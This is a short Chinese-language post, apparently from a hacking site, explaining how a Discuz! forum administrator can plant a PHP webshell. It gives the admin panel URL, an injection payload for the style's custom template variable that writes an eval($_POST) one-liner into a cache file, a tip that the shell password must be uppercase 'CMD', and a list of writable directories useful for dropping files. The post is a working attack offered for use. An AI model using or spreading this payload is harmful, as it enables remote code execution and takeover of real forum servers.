不需要创始人,只需要管理员。
http://www.fuck.com/admincp.php?action=styles&operation=edit&id=1&adv=1
中,最下面有个“自定义模板变量”,变量中填:
PHP代码
- OLDJUN', '#999');eval($_POST[cmd]);//
替换内容随便输入:1111,然后提交,一句话木马就产生了:
http://www.fuck.com/forumdata/cache/style_1.php
如果你修改的style的id是2的话,对于的shell就是style_2.php。
注:很多人反应连不上一句话:
PHP代码
- $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
这句话是说所有的变量名换成大写的了!
因此请用大写的CMD做为你一句话的密码!
附dz可写目录:
?附件目录 默认是 ./attachments
?数据目录 ./forumdata
?缓存目录 ./forumdata/cache
?数据目录 ./forumdata/templates
?主题缓存目录 ./forumdata/threadcaches
?缓存目录 ./forumdata/logs
?缓存目录 ./uc_client/data/cache
?缓存目录 ./uc_server/data
?缓存目录 ./uc_server/data/cache
?缓存目录 ./uc_server/data/view
?缓存目录 ./uc_server/data/avatar
?缓存目录 ./uc_server/data/logs
?缓存目录 ./uc_server/data/backup
?缓存目录 ./uc_server/data/tmp
推荐
评论(0条)
